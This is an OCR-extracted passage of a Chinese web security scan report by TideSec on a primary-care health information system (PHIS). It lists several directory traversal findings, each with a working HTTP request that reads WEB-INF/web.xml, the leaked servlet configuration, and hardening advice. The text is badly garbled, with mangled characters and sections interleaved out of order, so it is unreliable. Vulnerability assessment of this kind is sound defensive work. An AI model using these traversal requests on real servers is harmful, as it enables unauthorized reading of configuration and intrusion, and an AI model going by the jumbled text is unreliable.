基层医疗卫生信息系统 (3)

http:/10.8.3.187:9001/phis/web应用安全检测报告TideSec安全团队2020年08月12日rpcServer/servlet-namecom. caucho. hessian, server. HessianServlethome-classctd. net. rpc. server. HessianServiceDispatherrpcServer/rpc/*/url-pattern/servlet-mapping!一 AuthorizationServletctd. oauth. AuthorizationCostomAuthLogonctd.oauth. AuthLogonservlet-mappingsservlet-nameAuthorizationServlet/oauth/authorizeAuthLogon/oauth/authorize_logon/servlet-mappings -HttpForwardphis. source, controller. HttpControllerForward/servlet-classHttpForward/forward/*/url-pattern/servlet-mappingHTTP请求GET /phis/resources/phis/css/images/./././WEB-INF/web.xml?HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建议过滤（点）等可能的恶意字符：这个试用于能够修改线上代码，最为推荐的方法正则判断用户输入的参数的格式，看输入的格式是否合法：这个方法的匹配最为准确和细致，但是有很大难度，需要大量时间配置规则。php.ini配置open_basedir：这个参数值得的是用户只能访问的目录，作为不能修改线上代码时的备用方案。4.4目录遍历漏洞漏洞描述此脚本可能容易受到目录遍历攻击.Directory Traversal是一个漏洞，允许攻击者访问受限目录并在Web服务器的根目录之外执行命令。风险等级高危文件路径/phis/resources/sencha/ext3/css风险参数测试详情This file was found using the pattern $dirName/./././WEB-INF/web.xml?.Original directory: /phis/resources/sencha/ext3/cssDirectory traversal pattern found:webAppRootKeyphis. rootparam-name1og4jConfigLocati onclasspath:phis/spring/log4j. propertieslog4jRefreshInterval6000org. springframework, web. util. Log4jConfigListener/listener-classctd.mvc.controller, util. MVCSessionListenerspringServletorg. springframework, web. servlet. DispatcherServletcontextConfigLocationclasspath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring, xmlload-on-startup1/load-on-startupspringServlet/servlet-mappingrpcServer/servlet-namecom. caucho. hessian, server. HessianServlethome-classctd. net. rpc. server. HessianServiceDispatherrpcServer/servlet-name/rpc/*/servlet-mapping!一一 AuthorizationServlet/servlet-namectd. oauth. AuthorizationCostomAuthLogonctd. oauth. AuthLogonAuthorizationServlet/oauth/authorizeservlet-mappingsAuthLogon/oauth/authorize_logon/servlet-mappings 一HttpForwardservlet-classphis. source, controller. HttpControllerForward/servlet-classHttpForward/servlet-name/forward/*/servlet-mappingHTTP请求GET /phis/resources/sencha/ext3/css/./././WEB-INF/web.xml?HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建议过滤.（点）等可能的恶意字符：这个试用于能够修改线上代码，最为推荐的方法正则判断用户输入的参数的格式，看输入的格式是否合法：这个方法的匹配最为准确和细致，但是有很大难度，需要大量时间配置规则。php.ini配置open basedir：这个参数值得的是用户只能访问的目录，作为不能修改线上代码时的备用方案。4.5目录遍历漏洞漏洞描述此脚本可能容易受到目录遍历攻击.Directory Traversal是一个漏洞，允许攻击者访问受限目录并在Web服务器的根目录之外执行命令。风险等级高危文件路径/phis/resources/app风险参数测试详情This file was found using the pattern $dirName)/./WEB-INF/web.xml?.Original directory: /phis/resources/appDirectory traversal pattern found:webAppRootKeyphis. rootlog4jConfigLocationclasspath:phis/spring/log4j. propertiescontextparamlog4jRefreshInterval6000/param-valueorg. springframework, web. util. Log4jConfigListenerctd.mvc.controller, util. MVCSessionListenerspringServletorg. springframework, web. servlet. DispatcherServlet/servlet-classcontextConfigLocationparam-valueclasspath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring, xml/param-valuelservlet-mappingspringServlet/rpcServer/servlet-namecom. caucho. hessian, server. HessianServlethome-classctd. net. rpc. server. HessianServiceDispatherrpcServer/rpc/*/urlpattern/servlet-mapping!一 AuthorizationServletctd. oauth. AuthorizationCostomAuthLogonservlet-classctd. oauth. AuthLogonAuthorizationServlet/servlet-name/oauth/authorize/servlet-mappingsservlet-mappingsAuthLogon/oauth/authorize_logon/servlet-mappings 一HttpForward/servlet-namephis. source, controller. HttpControllerForward/servlet-classHttpForward/forwardA/servlet-mappingHTTP请求GET /phis/resources/app/.AVEB-INF/web.xml? HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建议过滤（点）等可能的恶意字符：这个试用于能够修改线上代码，最为推荐的方法正则判断用户输入的参数的格式，看输入的格式是否合法：这个方法的匹配最为准确和细致，但是有很大难度，需要大量时间配置规则。php.ini配置open_basedir：这个参数值得的是用户只能访问的目录，作为不能修改线上代码时的备用方案。4.6目录遍历漏洞漏洞描述此脚本可能容易受到目录遍历攻击.Directory Traversal是一个漏洞，允许攻击者访问受限目录并在Web服务器的根目录之外执行命令。风险等级高危文件路径/phis/resources/element风险参数测试详情This file was found using the pattern $(dirName/./WEB-INF/web.xml?.Original directory: /phis/resources/elementDirectory traversal pattern found:webAppRootKeyphis. root/param-valueparam-name1og4jConfigLocati onclasspath:phis/spring/log4j. properties/context-paramlog4jRefreshInterval6000org.springframework, web. util. Log4jConfigListenerctd.mvc.controller, util. MVCSessionListenerspringServletservlet-classorg. springframework, web. servlet. DispatcherServletcontextConfigLocationparam-valueclasspath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring. xml1. 评估综述本次评估对象为：网站URL： http:/10. 8. 3. 187:9001/phis/网站标题：基层医疗卫生信息系统IP地址：ErrorWEB安全扫描结果：高危漏洞：18个中危漏洞：6个低危漏洞：0个页面安全检测结果：URL总数：52动态URL： 1暗链页面： 敏感字页面：坏链页面：快照页面：信息泄露测试结果：开放端口： Error个子域名：1个敏感信息：02. WDScanner简介近几年，随着互联网各种安全漏洞愈演愈烈，OPENSSL心脏滴血漏洞、JAVA反序列化漏洞、STRUTS命令执行漏洞、ImageMagick命令执行漏洞等高危漏洞频繁爆发。在这种情况下，为了能在漏洞爆发后快速形成漏洞检测能力，同时能对网站或主机进行全面快速的安全检测，TideSec安全团队开发了分布式web安全监测平台WDScanneroWDScanner平台主要包括如下功能：分布式web漏洞扫描、客户管理、漏洞定期扫描、网站爬虫、暗链检测、网站指纹识别、漏洞定向检测、代理搜集及部署、密码定向破解、社工库查询等功能。lspringServlet/servlet-mappingrpcServercom. caucho. hessian, server. HessianServlethome-classctd. net. rpc. server. HessianServiceDispatherrpcServer/rpc/*/url-pattern!一一 servlet-nameAuthorizationServletctd. oauth. AuthorizationCostomAuthLogonctd.oauth. AuthLogonservlet-mappingsAuthorizationServlet/oauth/authorizeservlet-mappingsAuthLogon/servlet-name/oauth/authorize_logon/servlet-mappings 一HttpForwardservlet-classphis. source, controller. HttpControllerForward/servlet-classHttpForward/servlet-name/forward/*/servlet-mappingHTTP请求GET /phis/resources/element/./WEB-INF/web.xml? HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建议过滤.（点）等可能的恶意字符：这个试用于能够修改线上代码，最为推荐的方法正则判断用户输入的参数的格式，看输入的格式是否合法：这个方法的匹配最为准确和细致，但是有很大难度，需要大量时间配置规则。php.ini配置open_basedir：这个参数值得的是用户只能访问的目录，作为不能修改线上代码时的备用方案。4.7目录遍历漏洞漏洞描述此脚本可能容易受到目录遍历攻击.Directory Traversal是一个漏洞，允许攻击者访问受限目录并在Web服务器的根目录之外执行命令。风险等级高危文件路径/phis/resources/phis风险参数测试详情This file was found using the pattern $dirName/./WEB-INF/web.xml?.Original directory: /phis/resources/phisDirectory traversal pattern found:webAppRootKeyphis. rootlog4jConfigLocationclasspath:phis/spring/log4j. propertieslog4jRefreshInterval6000/param-valueorg. springframework, web. util. Log4jConfigListener/listener-classctd.mvc. controller, util. MVCSessionListener/listenerclassspringServletorg. springframework, web. servlet. DispatcherServletcontextConfigLocationclasspath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring, xml/param-valuelspringServlet/rpcServercom. caucho. hessian, server. HessianServlethome-classparam-valuectd. net. rpc. server. HessianServiceDispatherrpcServer/servlet-name/rpc/*/urlpattern/servlet-mapping!一一 AuthorizationServlet/servlet-namectd. oauth. AuthorizationCostomAuthLogonctd. oauth. AuthLogonservlet-mappingsservlet-nameAuthorizationServlet/oauth/authorizeAuthLogon/oauth/authorize_logon/servlet-mappings -HttpForward/servlet-namephis. source, controller. HttpControllerForwardHttpForward/servlet-name/forward/*/url-pattern/servlet-mappingHTTP请求GET /phis/resources/phis/./WEB-INF/web.xml? HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建议过滤.（点）等可能的恶意字符：这个试用于能够修改线上代码，最为推荐的方法正则判断用户输入的参数的格式，看输入的格式是否合法：这个方法的匹配最为准确和细致，但是有很大难度，需要大量时间配置规则。php.ini配置open_basedir：这个参数值得的是用户只能访问的目录，作为不能修改线上代码时的备用方案。4.8目录遍历漏洞漏洞描述此脚本可能容易受到目录遍历攻击.Directory Traversal是一个漏洞，允许攻击者访问受限目录并在Web服务器的根目录之外执行命令。风险等级高危文件路径/phis/resources/app/desktop风险参数This file was found using the pattern $dirName)/././WEB-INF/web.xml?.Original directory: /phis/resources/app/desktopDirectory traversal pattern found:测试详情webAppRootKeyphis. rootlog4jConfigLocati onclasspath:phis/spring/log4j. propertieslog4jRefreshInterval6000/param-valueorg. springframework, web. util. Log4jConfigListener/listener-classctd.mvc.controller, util. MVCSessionListenerspringServletorg. springframework, web. servlet. DispatcherServlet/servlet-classcontextConfigLocationparam-valueclasspath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring. xml/param-valuelspringServlet/servlet-mappingrpcServer/servlet-namecom. caucho. hessian, server. HessianServlethome-classctd. net. rpc. server. HessianServiceDispatherrpcServer/rpc/*/url-pattern/servlet-mapping!一 AuthorizationServletctd. oauth. AuthorizationCostomAuthLogonctd. oauth. AuthLogonservlet-mappingsservlet-nameAuthorizationServlet/oauth/authorizeAuthLogon/oauth/authorize_logon/servlet-mappings -HttpForwardphis. source, controller. HttpControllerForward/servlet-classHttpForward/forward/*/url-pattern/servlet-mappingHTTP请求GET /phis/resources/app/desktop/./.AVEB-INF/web.xml?HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建议过滤（点）等可能的恶意字符：这个试用于能够修改线上代码，最为推荐的方法正则判断用户输入的参数的格式，看输入的格式是否合法：这个方法的匹配最为准确和细致，但是有很大难度，需要大量时间配置规则。php.ini配置open_basedir：这个参数值得的是用户只能访问的目录，作为不能修改线上代码时的备用方案。4.9目录遍历漏洞漏洞描述此脚本可能容易受到目录遍历攻击.Directory Traversal是一个漏洞，允许攻击者访问受限目录并在Web服务器的根目录之外执行命令。风险等级高危文件路径/phis/resources风险参数测试详情This file was found using the pattern $dirName/./WEB-INF/web.xml?.Original directory: /phis/resourcesDirectory traversal pattern found:webapp xmlns=z，http: /java. sun. com/xml/ns/javaee/zxmlns: xsi=/，http:/www. w3. org/2001/XMLSchema-instancez，xsi: schemaLocation=z/http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/we